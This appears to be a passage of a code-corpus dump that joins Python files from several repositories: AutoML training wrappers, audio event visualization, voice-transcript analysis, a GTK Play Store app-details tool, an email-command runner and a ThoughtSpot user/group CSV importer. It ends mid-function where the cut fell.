#### File: allie/training/train_autokaggle.py
```python
import os, pickle
curdir=os.getcwd()
print(os.getcwd())
print('initializing installation')
os.system('pip3 install autokaggle==0.1.0')
os.system('pip3 install scikit-learn==0.22')
from autokaggle.tabular_supervised import TabularClassifier
from autokaggle.tabular_supervised import TabularRegressor
os.chdir(curdir)
def train_autokaggle(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
model_name=common_name_model+'.pickle'
files=list()
if mtype in ['classification', 'c']:
# fit classifier
clf = TabularClassifier()
clf.fit(X_train, y_train, time_limit=12 * 60 * 60)
# SAVE ML MODEL
modelfile=open(model_name,'wb')
pickle.dump(clf, modelfile)
modelfile.close()
elif mtype in ['regression', 'r']:
print("Starting AutoKaggle")
clf = TabularRegressor()
clf.fit(X_train, y_train, time_limit=12 * 60 * 60)
# saving model
print('saving model')
modelfile=open(model_name,'wb')
pickle.dump(clf, modelfile)
modelfile.close()
model_dir=os.getcwd()
files.append(model_name)
return model_name, model_dir, files
```
#### File: allie/training/train_btb.py
```python
import warnings, datetime, uuid, os, json, shutil, pickle
warnings.filterwarnings('ignore')
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.model_selection import cross_val_score
from sklearn.metrics import make_scorer
import pandas as pd
os.system('pip3 install baytune==0.3.7')
# os.system('pip3 install autobazaar==0.2.0')
# os.system('pip3 install gitpython==3.0.2')
# os.system('pip3 install --upgrade GitPython==2.1.15')
# os.system('pip3 install --upgrade gitdb2==2.0.6 gitdb==0.6.4 ')
# make imports
print('installing package configuration')
from btb.session import BTBSession
from btb.tuning import Tunable
from btb.tuning.tuners import GPTuner
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import make_scorer, r2_score
from sklearn.model_selection import cross_val_score
from sklearn.svm import SVC
from btb.selection import UCB1
from btb.tuning.hyperparams import FloatHyperParam, IntHyperParam
'''
Taken from the example here:
https://github.com/HDI-Project/BTB/blob/master/notebooks/BTBSession%20-%20Example.ipynb
Note that autobazaar is used as the primary model trainer for BTB sessions.
https://github.com/HDI-Project/AutoBazaar
Tutorial:
https://hdi-project.github.io/AutoBazaar/readme.html#install
Data: Must be formatted (https://github.com/mitll/d3m-schema/blob/master/documentation/datasetSchema.md)
Case 1: Single table
In many openml and other tabular cases, all the learning data is contained in a single tabular file. In this case, an example dataset will look like the following.
<dataset_id>/
|-- tables/
|-- learningData.csv
d3mIndex,sepalLength,sepalWidth,petalLength,petalWidth,species
0,5.2,3.5,1.4,0.2,I.setosa
1,4.9,3.0,1.4,0.2,I.setosa
2,4.7,3.2,1.3,0.2,I.setosa
3,4.6,3.1,1.5,0.2,I.setosa
4,5.0,3.6,1.4,0.3,I.setosa
5,5.4,3.5,1.7,0.4,I.setosa
...
'''
def create_json(foldername, trainingcsv):
# create the template .JSON file necessary for the featurization
dataset_name=foldername
dataset_id=str(uuid.uuid4())
columns=list()
colnames=list(pd.read_csv(trainingcsv))
for i in range(len(colnames)):
if colnames[i] != 'class_':
columns.append({"colIndex": i,
"colName": colnames[i],
"colType": "real",
"role": ["attribute"]})
else:
columns.append({"colIndex": i,
"colName": 'class_',
"colType": "real",
"role": ["suggestedTarget"]})
data={"about":
{
"datasetID": dataset_id,
"datasetName":dataset_name,
"humanSubjectsResearch": False,
"license":"CC",
"datasetSchemaVersion":"3.0",
"redacted":False
},
"dataResources":
[
{
"resID": "0",
"resPath": os.getcwd()+'/'+trainingcsv,
"resType": "table",
"resFormat": ["text/csv"],
"isCollection": False,
"columns":columns,
}
]
}
filename='datasetDoc.json'
jsonfile=open(filename,'w')
json.dump(data,jsonfile)
jsonfile.close()
return dataset_id, filename
def train_btb(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# create file names
model_name=common_name_model+'.pickle'
folder='btb_session'
csvname=common_name_model.split('_')[0]
curdir=os.getcwd()
files=list()
# make a temporary folder for the training session
try:
os.mkdir(folder)
os.chdir(folder)
except:
shutil.rmtree(folder)
os.mkdir(folder)
os.chdir(folder)
# get training and testing data
try:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train_transformed.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test_transformed.csv',os.getcwd()+'/test.csv')
except:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test.csv',os.getcwd()+'/test.csv')
# create required .JSON
dataset_id, filename=create_json(folder, 'train.csv')
os.mkdir(dataset_id)
os.chdir(dataset_id)
os.mkdir('tables')
shutil.copy(curdir+'/'+folder+'/train.csv', os.getcwd()+'/tables/train.csv')
if mtype=='c':
def build_model(name, hyperparameters):
model_class = models[name]
return model_class(random_state=0, **hyperparameters)
def score_model(name, hyperparameters):
model = build_model(name, hyperparameters)
scores = cross_val_score(model, X_train, y_train)
return scores.mean()
rf_hyperparams = {'n_estimators': IntHyperParam(min=10, max=500),
'max_depth': IntHyperParam(min=10, max=500)}
rf_tunable = Tunable(rf_hyperparams)
print(rf_tunable)
svc_hyperparams = {'C': FloatHyperParam(min=0.01, max=10.0),
'gamma': FloatHyperParam(0.000000001, 0.0000001)}
svc_tunable = Tunable(svc_hyperparams)
print(svc_tunable)
tuners = {'RF': rf_tunable,
'SVC': svc_tunable}
print(tuners)
models = {'RF': RandomForestClassifier,
'SVC': SVC}
selector = UCB1(['RF', 'SVC'])
session = BTBSession(tuners, score_model, verbose=True)
best_proposal = session.run(iterations=100)
best_model = build_model(best_proposal['name'], best_proposal['config'])
best_model.fit(X_train, y_train)
accuracy = best_model.score(X_test, y_test)
# tuner.record(parameters, score)
print('ACCURACY:')
print(accuracy)
# now save the model in .pickle
os.chdir(curdir)
f=open(model_name,'wb')
pickle.dump(best_model, f)
f.close()
elif mtype == 'r':
tunables = {
'random_forest': {
'n_estimators': {'type': 'int', 'default': 2, 'range': [1, 1000]},
'max_features': {'type': 'str', 'default': 'log2', 'range': [None, 'auto', 'log2', 'sqrt']},
'min_samples_split': {'type': 'int', 'default': 2, 'range': [2, 20]},
'min_samples_leaf': {'type': 'int', 'default': 2, 'range': [1, 20]},
},
'extra_trees': {
'n_estimators': {'type': 'int', 'default': 2, 'range': [1, 1000]},
'max_features': {'type': 'str', 'default': 'log2', 'range': [None, 'auto', 'log2', 'sqrt']},
'min_samples_split': {'type': 'int', 'default': 2, 'range': [2, 20]},
'min_samples_leaf': {'type': 'int', 'default': 2, 'range': [1, 20]},
}
}
models = {
'random_forest': RandomForestRegressor,
'extra_trees': ExtraTreesRegressor,
}
def build_model(name, hyperparameters):
model_class = models[name]
return model_class(random_state=0, **hyperparameters)
def score_model(name, hyperparameters):
model = build_model(name, hyperparameters)
r2_scorer = make_scorer(r2_score)
scores = cross_val_score(model, X_train, y_train, scoring=r2_scorer)
return scores.mean()
session = BTBSession(tunables, score_model, verbose=True)
best_proposal = session.run(iterations=100)
best_model = build_model(best_proposal['name'], best_proposal['config'])
best_model.fit(X_train, y_train)
pred = best_model.predict(X_test)
r2_score=r2_score(y_test, pred)
print('R2 score!!')
print(r2_score)
# now save the model in .pickle
os.chdir(curdir)
f=open(model_name,'wb')
pickle.dump(best_model, f)
f.close()
files.append(model_name)
files.append(folder)
model_dir=os.getcwd()
return model_name, model_dir, files
```
#### File: allie/training/train_safe.py
```python
import os, sys, shutil, pickle, json
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.pipeline import Pipeline
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier
import numpy as np
import pandas as pd
print('installing library')
os.system('pip3 install safe-transformer==0.0.5')
from SafeTransformer import SafeTransformer
def train_safe(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# only store transform and surrogate model
model_name=common_name_model+'.pickle'
files=list()
curdir=os.getcwd()
csvname=common_name_model.split('_')[0]
# get training and testing data
try:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train_transformed.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test_transformed.csv',os.getcwd()+'/test.csv')
except:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test.csv',os.getcwd()+'/test.csv')
# now load the training data as pandas dataframe
data=pd.read_csv('train.csv')
X_train=data.drop(columns=['class_'], axis=1)
y_train=data['class_']
print('Starting FIT')
if mtype in ['classification', 'c']:
print('CLASSIFICATION')
print('training surrogate model...')
surrogate_model = XGBClassifier().fit(X_train, y_train)
print('training base model...')
base_model = LogisticRegression().fit(X_train, y_train)
safe_transformer = SafeTransformer(model=surrogate_model, penalty=1)
pipe = Pipeline(steps=[('safe', safe_transformer), ('linear', base_model)])
print('training pipeline...')
pipe = pipe.fit(X_train, y_train)
elif mtype in ['regression', 'r']:
print('REGRESSION')
surrogate_model = GradientBoostingRegressor(n_estimators=100, max_depth=4, learning_rate=0.1,loss='huber')
print('training surrogate model...')
surrogate_model = surrogate_model.fit(X_train, y_train)
print('loading base model')
linear_model = LinearRegression()
safe_transformer = SafeTransformer(surrogate_model, penalty = 0.84)
print('training pipeline...')
pipe = Pipeline(steps=[('safe', safe_transformer), ('linear', linear_model)])
pipe = pipe.fit(X_train, y_train)
# SAVE SURROGATE ML MODEL
modelfile=open(model_name,'wb')
pickle.dump(pipe, modelfile)
modelfile.close()
files.append(model_name)
files.append('train.csv')
files.append('test.csv')
model_dir=os.getcwd()
return model_name, model_dir, files
``` |
{
"source": "jim-schwoebel/sound_event_detection",
"score": 2
} |
#### File: sound_event_detection/sed_vis/visualize.py
```python
import sys, sed_vis, dcase_util
def visualize_sample(audiofilepath, csvfilepath):
# taken from sed_vis documentation - https://github.com/TUT-ARG/sed_vis
# thanks Audio Research Group, Tampere University!
# Load audio signal first
audio_container = dcase_util.containers.AudioContainer().load(audiofilepath)
# Load event lists
reference_event_list = dcase_util.containers.MetaDataContainer().load(csvfilepath)
event_lists = {'reference': reference_event_list}
# Visualize the data
vis = sed_vis.visualization.EventListVisualizer(event_lists=event_lists,
audio_signal=audio_container.data,
sampling_rate=audio_container.fs)
vis.show()
audiofilepath=sys.argv[1]
csvfilepath=sys.argv[2]
visualize_sample(audiofilepath, csvfilepath)
``` |
{
"source": "jim-schwoebel/voiceome",
"score": 3
} |
#### File: scripts/references/metrics2.py
```python
import pandas as pd
import difflib
import numpy as np
import nltk
from nltk import word_tokenize
g=pd.read_csv('new2.csv')
labels=list(g)
for i in range(len(labels)):
if labels[i].lower().find('caterpillar') > 0:
caterpillar=labels[i]
def extract_transcript(transcript):
try:
return transcript.split(') ')[1]
except:
return ''
def animal_features(transcript, animal_list):
transcript=transcript.lower().split(' ')
count=0
for j in range(len(transcript)):
if transcript in animal_list:
count=count+1
return count
def letterf_features(transcript):
transcript=transcript.lower().split(' ')
count=0
words=list()
for j in range(len(transcript)):
if transcript[j].startswith('f') and transcript[j] not in words:
count=count+1
words.append(transcript[j])
return count
def passage_features(transcript, reference):
# similarity (https://stackoverflow.com/questions/1471153/string-similarity-metrics-in-python)
# similarity
seq=difflib.SequenceMatcher(a=transcript.lower(), b=reference.lower())
# longest matching string
match = seq.find_longest_match(0, len(transcript), 0, len(reference))
return 100*seq.ratio() #, match.size, match.a, match.b
def mean_std(list_):
array_=np.array(list_)
return np.mean(array_), np.std(array_)
animals=g['Category: ANIMALS. Name all the animals you can think of as quickly as possible before the time elapses below.']
words=list()
stopwords=['um', 'think','hum','oh',"let's",'blue','name','uhm','brown',"i'm",'category','ok','uh',
'time','ah', 'yeah', 'hey', 'love', 'lot', 'god', 'eh', 'funny', 'sure', 'honey', 'sugar',
'doc', 'email', 'al', 'il', 'rap', 'count', 'talk', 'check', 'ha', 'anything', 'jack', 'cheap',
'wow', 'world', 'devil', 'gosh', 'mama', 'please', 'kind', 'king', 'thing', 'sorry', 'see',
'awesome', 'uhm', 'yellow', 'tail', 'need', 'mu', 'search', 'wizard', 'kid', 'wanna', 'mind', 'girl',
'giant', 'fire', 'care', 'steak', 'weather', 'war', 'window', 'rock', 'ego', 'word', 'camera', 'square',
'kiwi', 'pie', 'cheat', 'kit', 'grey', 'warm', 'dumb', 'border', 'auto', 'god', 'fear', 'die', 'author', 'mix',
'experience', 'grow', 'aw', 'doe', 'drive', 'stuck', 'number', 'oil', 'fan', 'pay', 'amazon', 'problem', 'jesus',
'laugh', "i'd", 'ghost', 'cause', 'target', 'pay', 'mingo', 'tire', 'strange', 'bar', 'canadian', 'beef',
'wine', 'asp', 'poop', 'dollar', 'record', 'coca', 'exit', 'ceo', 'donald', 'blog', 'store', 'myth', 'act', 'ow',
'horny', 'alliana', 'gun', 'cina', 'firm', 'elf', 'walmart', 'remind', 'mr', 'underground', 'hurdle', 'payroll',
'commas',' audi', 'salon', 'milk']
for i in range(len(animals)):
transcript=extract_transcript(animals[i]).lower().replace('.','').replace('?','').replace(',','').split()
for j in range(len(transcript)):
# cehck if the word is a noun
if nltk.pos_tag(word_tokenize(transcript[j]))[0][1] == 'NN' and transcript[j] not in stopwords:
words=words+[transcript[j]]
unique_words=list(set(words))
unique_counts=dict()
for i in range(len(unique_words)):
unique_counts[unique_words[i]]=words.count(unique_words[i])
g={k: v for k, v in sorted(unique_counts.items(), key=lambda item: item[1])}
print(list(g))
```
#### File: scripts/visualization/histogram_nonwords.py
```python
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
from matplotlib.ticker import PercentFormatter
import time, math
from nltk import FreqDist
import numpy as np
import pandas as pd
from tqdm import tqdm
def get_variables(transcript):
# get transcript split
transcript=transcript.replace('.','').lower()
transcript=transcript.split()
# get top 10 word counts
unique=list(set(transcript))
counts=dict()
for k in range(len(unique)):
counts[unique[k]]=transcript.count(unique[k])
counts=list(sorted(counts.items(), key=lambda x: x[1], reverse=True))
x=list()
y=list()
count=0
i=0
while count < 5:
if str(counts[i][0]).replace(' ','') in ['nan', 'undefined']:
i=i+1
else:
x.append(counts[i][0])
y.append(counts[i][1])
count=count+1
i=i+1
return x, y
def get_transcript():
pass
csvfiles=['01_plive.csv', '02_fwov.csv', '03_zowl.csv', '04_zulx.csv', '05_vave.csv', '06_kwaj.csv', '07_jome.csv', '08_bwiz.csv', '09_broe.csv', '10_nayb.csv']
fig, axes = plt.subplots(nrows=2, ncols=5, figsize=(12, 8))
width = 0.4
for i in range(2):
for j in range(5):
# get transcript word
print((i)*5+j)
csvfile=csvfiles[(i)*5+j]
data=pd.read_csv(csvfile)
data=list(data['azure'])
transcript=''
for k in tqdm(range(len(data))):
transcript=transcript+' '+str(data[k])
x, y = get_variables(transcript)
axes[i, j].bar(x,y, color='navy', width=width)
axes[i, j].set_title(csvfiles[(i)*5+j].replace('.csv',''))
axes[i,j].set_ylim([0,2000])
for ax in axes.flat:
# xlabel='keyword',
ax.set(ylabel='counts')
ax.tick_params(axis='x', rotation=90)
fig.suptitle('Top 5 keywords across Nonword Naming Tasks for Survey A')
plt.tight_layout()
plt.show()
``` |
{
"source": "JimScope/apkdown",
"score": 3
} |
#### File: JimScope/apkdown/apkdown.py
```python
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
import json
import sys
import requests
from concurrent.futures.thread import ThreadPoolExecutor
from playstore.playstore import Playstore
# Default credentials file location.
credentials_default_location = 'credentials.json'
# Default directory where to save the downloaded applications.
downloaded_apk_default_location = 'Downloads'
class ApiData:
"""Retrieve data of the apk through the api"""
def __init__(self, package_name):
self.package_name = package_name
self.icon = False
try:
app = api.app_details(self.package_name).docV2
except:
print(
'Error when downloading "{0}". Unable to get app\'s details.'.
format(self.package_name))
sys.exit(1)
self.details = {
'package_name': app.docid,
'title': app.title,
'creator': app.creator
}
for image in app.image:
if image.imageType == 4:
response = requests.get(image.imageUrl)
if response.status_code == 200:
with open('apk_icon.png', 'wb') as f:
f.write(response.content)
self.icon = True
break
class Downloader(Gtk.Window):
"""docstring for Downloader"""
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("gui.glade")
self.builder.connect_signals(self)
# Load windows from gui.glade
self.window = self.builder.get_object("MainWindow")
self.AboutDialog = self.builder.get_object("AboutDialog")
self.WindowConf = self.builder.get_object("WindowConf")
# Load objects from gui.glade
self.apk_image = self.builder.get_object("apk_image")
self.progressbar = self.builder.get_object("progressbar")
self.input_address = self.builder.get_object("input_address")
self.label_package = self.builder.get_object("label_package")
self.label_title = self.builder.get_object("label_title")
self.label_developer = self.builder.get_object("label_developer")
def on_MainWindow_destroy(self, *args):
thread.shutdown(wait=True)
Gtk.main_quit(*args)
def on_btn_about_clicked(self, widget):
self.AboutDialog.run()
self.AboutDialog.hide()
def on_btn_conf_clicked(self, button):
self.WindowConf.show()
def on_btn_save_clicked(self, button):
pass
def on_btn_download_clicked(self, button):
pass
def check_url(self, widget):
thread.submit(self.check)
def check(self):
package = self.input_address.get_text()
if package != '':
data = ApiData(package)
info = data.details
self.label_package.set_text(info['package_name'])
self.label_title.set_text(info['title'])
self.label_developer.set_text(info['creator'])
if data.icon == True:
self.apk_image.set_from_file('apk_icon.png')
else:
pass
if __name__ == '__main__':
try:
api = Playstore(credentials_default_location)
except:
print("Connect to Internet")
thread = ThreadPoolExecutor(1)
win = Downloader()
win.window.connect("delete_event", Gtk.main_quit)
win.window.show_all()
Gtk.main()
``` |
{
"source": "JimScope/PowerM",
"score": 3
} |
#### File: JimScope/PowerM/PowerM.py
```python
from time import sleep
import traceback
# Local Modules
import config
import emailer
import utilities
# Importing PowerM Modules
from modules.test import multiply
from modules.test import slow
from modules.admin import logs
def on_startup():
utilities.log("Starting up.")
# Ensure the user has setup the script
if config.email_user_name == "" or config.white_list == [] or config.email_password == "":
utilities.log("Email variables are not setup. Exiting.")
exit(1)
utilities.log("Waiting for startup delay.")
def read_commands():
messages = emailer.read()
#|
if messages is None:
# print("Empty")
pass
else:
for x in messages:
if x[1].startswith("$logs"):
thread_logs = logs.MyThread(x[0])
thread_logs.start()
if x[1].startswith("$multiply"):
keywords = x[1].lstrip("$multiply ")
thread_multiply = multiply.MyThread(x[0],keywords)
thread_multiply.start()
elif x[1].startswith("$slow"):
keywords = x[1].lstrip("$slow ")
thread_slow = slow.MyThread(x[0],keywords)
thread_slow.start()
#|
def main():
on_startup()
try:
print("Welcome to PowerM\nCtrl-C to exit")
print("Waiting for startup delay.")
while True:
sleep(15)
read_commands()
except Exception:
# In case of an uncaught exception, get stacktrace for diag and exit.
trace_string = traceback.format_exc()
# log it locally in case internet is down
utilities.log("Something happened, I have crashed:\n" + trace_string)
# Build and send an email
sub = "PowerMail crashed"
msg = "Something went wrong with PowerMail, here is the stack trace:\n\n" + trace_string
emailer.send(config.support, sub, msg)
# Exit the program with error code 1
exit(1)
main()
``` |
{
"source": "JimSEvans/user_tools",
"score": 2
} |
#### File: user_tools/tsut/io.py
```python
import ast
import copy
import json
import csv
import json
import os
import re
import logging
#from openpyxl import Workbook
#import xlrd # reading Excel
import cx_Oracle
from .api import UsersAndGroups, User, Group, eprint, write_outcome_file
"""
Copyright 2018 ThoughtSpot
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# -------------------------------------------------------------------------------------------------------------------
"""Classes to read and write users and groups."""
class UGXLSWriter:
"""
Writes users and groups to an Excel spreadsheet.
"""
def write(self, users_and_groups, filename):
"""
Writes the content to the given file.
:param users_and_groups: The UsersAndGroups object to write.
:type users_and_groups: UsersAndGroups
:param filename: Name of the file to write to. No extension is expected and one will be added.
:type filename: str
"""
workbook = Workbook()
workbook.remove(
workbook.active
) # remove the default sheet since we'll be creating the ones we want.
self._write_users(workbook, users_and_groups.get_users())
self._write_groups(workbook, users_and_groups.get_groups())
if not (filename.endswith("xls") or filename.endswith("xlsx")):
filename += ".xlsx"
workbook.save(filename)
def _write_users(self, workbook, users):
"""
Writes the users to a worksheet.
:param workbook: The workbook to write to.
:type workbook: Workbook
:param users: The list of groups to write.
:type users: list of User
:return:
"""
ws = workbook.create_sheet(title="Users")
self._write_header(
ws,
[
"Name",
"Password",
"Display Name",
"Email",
"Groups",
"Visibility"
],
)
cnt = 2 # start after header.
for user in users:
ws.cell(column=1, row=cnt, value=user.name)
ws.cell(column=2, row=cnt, value=user.password)
ws.cell(column=3, row=cnt, value=user.displayName)
ws.cell(column=4, row=cnt, value=user.mail)
ws.cell(column=5, row=cnt, value=json.dumps(user.groupNames))
ws.cell(column=6, row=cnt, value=user.visibility)
cnt += 1
def _write_groups(self, workbook, groups):
"""
Writes the groups to a worksheet.
:param workbook: The workbook to write to.
:type workbook: Workbook
:param groups: The list of groups to write.
:type groups: list
:return:
"""
ws = workbook.create_sheet(title="Groups")
self._write_header(
ws,
[
"Name",
"Display Name",
"Description",
"Groups",
"Visibility",
"Privileges",
],
)
cnt = 2 # start after header.
for group in groups:
ws.cell(column=1, row=cnt, value=group.name)
ws.cell(column=2, row=cnt, value=group.displayName)
ws.cell(column=3, row=cnt, value=group.description)
ws.cell(column=4, row=cnt, value=json.dumps(group.groupNames))
ws.cell(column=5, row=cnt, value=group.visibility)
privileges = group.privileges if group.privileges else []
ws.cell(column=6, row=cnt, value=json.dumps(privileges))
cnt += 1
@staticmethod
def _write_header(worksheet, cols):
"""
Writes the header for the given worksheet in row 1.
:param worksheet: Worksheet to write to.
:param cols: List of columns to write.
"""
for ccnt in range(0, len(cols)):
worksheet.cell(column=(ccnt + 1), row=1, value=cols[ccnt])
class UGXLSReader:
"""
Reads user and group info from an Excel file that is formatted the same as the UGXLSWriter writes.
"""
required_sheets = ["Users", "Groups"]
required_columns = {
"Users": [
"Name",
"Password",
"Display Name",
"Email",
"Groups",
"Visibility"
],
"Groups": [
"Name",
"Display Name",
"Description",
"Groups",
"Visibility"
],
}
def __init__(self):
"""
Creates a new UGXLSReader
"""
self.workbook = None
self.indices = {}
self.users_and_groups = UsersAndGroups()
def read_from_excel(self, filepath):
"""
Reads users and groups from the given file.
:param filepath: Path to the Excel file to read from.
:type filepath: str
:return: Returns the users and groups read from the Excel file. The users and groups are not validated
:rtype UsersAndGroups
so that they can be modified prior to validation.
"""
self.workbook = xlrd.open_workbook(filepath)
if self._verify_file_format():
self._get_column_indices()
self._read_users_from_workbook()
self._read_groups_from_workbook()
return self.users_and_groups
def _verify_file_format(self):
"""
:return: True if the format of the workbook is valid.
:rtype: bool
"""
is_valid = True
sheet_names = self.workbook.sheet_names()
for required_sheet in UGXLSReader.required_sheets:
if required_sheet not in sheet_names:
eprint("Error: missing sheet %s!" % required_sheet)
is_valid = False
else:
sheet = self.workbook.sheet_by_name(required_sheet)
header_row = sheet.row_values(rowx=0, start_colx=0)
for required_column in UGXLSReader.required_columns[
required_sheet
]:
if required_column not in header_row:
eprint(
"Error: missing column %s in sheet %s!"
% (required_column, required_sheet)
)
is_valid = False
return is_valid
def _get_column_indices(self):
"""
Reads the sheets to get all of the column indices. Assumes the format was already checked.
"""
sheet_names = self.workbook.sheet_names()
for sheet_name in sheet_names:
if sheet_name in self.required_sheets:
sheet = self.workbook.sheet_by_name(sheet_name)
col_indices = {}
ccnt = 0
for col in sheet.row_values(rowx=0, start_colx=0):
col_indices[col] = ccnt
ccnt += 1
self.indices[sheet_name] = col_indices
def _read_users_from_workbook(self):
"""
Reads all the users from the workbook.
"""
table_sheet = self.workbook.sheet_by_name("Users")
indices = self.indices["Users"]
for row_count in range(1, table_sheet.nrows):
row = table_sheet.row_values(rowx=row_count, start_colx=0)
# "Name", "Password", "Display Name", "Email", "Description", "Groups", "Visibility"
username = row[indices["Name"]]
password = row[indices["Password"]]
display_name = row[indices["Display Name"]]
email = row[indices["Email"]]
groups = []
if row[indices["Groups"]]:
groups = ast.literal_eval(
row[indices["Groups"]]
) # assumes a valid list format, e.g. ["a", "b", ...]
visibility = row[indices["Visibility"]]
try:
user = User(
name=username,
password=password,
display_name=display_name,
mail=email,
group_names=groups,
visibility=visibility,
)
# The format should be consistent with only one user per line.
self.users_and_groups.add_user(
user, duplicate=UsersAndGroups.RAISE_ERROR_ON_DUPLICATE
)
except:
eprint(f"Error reading user with name {username}")
def _read_groups_from_workbook(self):
"""
Reads all the groups from the workbook.
"""
table_sheet = self.workbook.sheet_by_name("Groups")
indices = self.indices["Groups"]
for row_count in range(1, table_sheet.nrows):
row = table_sheet.row_values(rowx=row_count, start_colx=0)
# Name", "Display Name", "Description", "Groups", "Visibility"
group_name = row[indices["Name"]]
display_name = row[indices["Display Name"]]
description = row[indices["Description"]]
visibility = row[indices["Visibility"]]
groups = []
if row[indices["Groups"]] and row[
indices["Groups"]
]:
groups = ast.literal_eval(
row[indices["Groups"]]
) # assumes a valid list format, e.g. ["a", "b", ...]
try:
group = Group(
name=group_name,
display_name=display_name,
description=description,
group_names=groups,
visibility=visibility,
)
# The format should be consistent with only one group per line.
self.users_and_groups.add_group(
group, duplicate=UsersAndGroups.RAISE_ERROR_ON_DUPLICATE
)
except Exception:
eprint("Error reading group with name %s" % group_name)
class UGCSVReader:
"""
Reads users and groups from CSV. All users come from the user_csv file and
groups are from the group_csv file.
"""
DEFAULT_USER_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"mail": "Email",
"password": "Password",
"group_names": "Groups",
"visibility": "Visibility"
}
DEFAULT_GROUP_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"description": "Description",
"group_names": "Groups",
"visibility": "Visibility",
"privileges": "Privileges"
}
def __init__(self,
user_field_mapping=DEFAULT_USER_FIELD_MAPPING,
group_field_mapping=DEFAULT_GROUP_FIELD_MAPPING,
delimiter=","):
"""
Creates a new CSV reader that can read based on the field mapping and delimiter. While this class can
cause groups to be created, the primary use is to have groups that will be.......??????????????????
:param user_field_mapping: The mapping of columns to values for users.
:type user_field_mapping: dict of str:str
:param group_field_mapping: The mapping of columns to values for groups.
:type group_field_mapping: dict of str:str
:param delimiter: The delimiter to use.
"""
self.user_field_mapping = copy.copy(user_field_mapping)
self.group_field_mapping = copy.copy(group_field_mapping)
self.delimiter = delimiter
self.validate_fields()
def validate_fields(self):
"""
Verifies that the minimal required field mappings exist. Raises a ValueError if not.
:return: None
:raises: ValueError
"""
if "name" not in self.user_field_mapping.keys():
raise ValueError("Missing mapping for 'name' for use with user CSV.")
if "name" not in self.group_field_mapping.keys():
raise ValueError("Missing mapping for 'name' for use with groups CSV.")
def read_from_file(self, user_file, group_file=None):
"""
Loads users and groups from the files. If the group_file is not provided, the groups will be created from the
user file with just the names.
:param user_file: Path to the user file to read from.
:type user_file: str
:param group_file: Path to the group file to read from.
:type group_file: str
:return: Users and groups object.
:rtype: UsersAndGroups
"""
# initialize UsersAndGroups object to add User and Group objects to
uag = UsersAndGroups()
# Do minimal check on user CSV file, read, create User.
# Saving the column name that "name" maps to since I use it again later
user_name_column_name = self.user_field_mapping["name"]
column_names = None
with open(user_file, 'r') as uf:
csv_reader = csv.reader(uf)
csv_dict_reader = csv.DictReader(uf)
firstline = 1
for line in csv_dict_reader:
#for the first line, check column names
if firstline:
column_names = line.keys()
if user_name_column_name not in column_names:
raise ValueError("No column called '%s' in CSV" % user_name_column_name)
# create User object
#handle blanks in group_names column
groups_field_raw = line[self.user_field_mapping["group_names"]]
groups_field = "[]" if groups_field_raw == "" else groups_field_raw
u = User(
name = line[user_name_column_name],
display_name = line[self.user_field_mapping["display_name"]],
mail = line[self.user_field_mapping["mail"]],
password = line[self.user_field_mapping["password"]],
group_names = ast.literal_eval(groups_field),# assumes valid list format, e.g. ["a", "b", ...]
visibility = line[self.user_field_mapping["visibility"]]
)
#add User to UsersAndGroups object
uag.add_user(u)
firstline = 0
# If there, do minimal check on group CSV file, read, create Group.
# Saving the column name that "name" maps to since I use it again later
group_name_column_name = self.group_field_mapping["name"]
g_column_names = None
if group_file is not None:
with open(group_file, 'r') as gf:
g_csv_reader = csv.reader(gf)
firstline = 1
g_csv_dict_reader = csv.DictReader(gf)
for line in g_csv_dict_reader:
#for the first line, check column names
if firstline:
g_column_names = line.keys()
if group_name_column_name not in g_column_names:
raise ValueError("No column called '%s' in CSV" % group_name_column_name)
if group_name_column_name not in g_column_names:
raise ValueError("No column called '%s' in CSV" % group_name_column_name)
# create Group object
#handle blanks in group_names column
g_groups_field_raw = line[self.group_field_mapping["group_names"]]
g_groups_field = "[]" if g_groups_field_raw == "" else g_groups_field_raw
g = Group(
name = line[group_name_column_name],
display_name = line[self.group_field_mapping["display_name"]],
description = line[self.group_field_mapping["description"]],
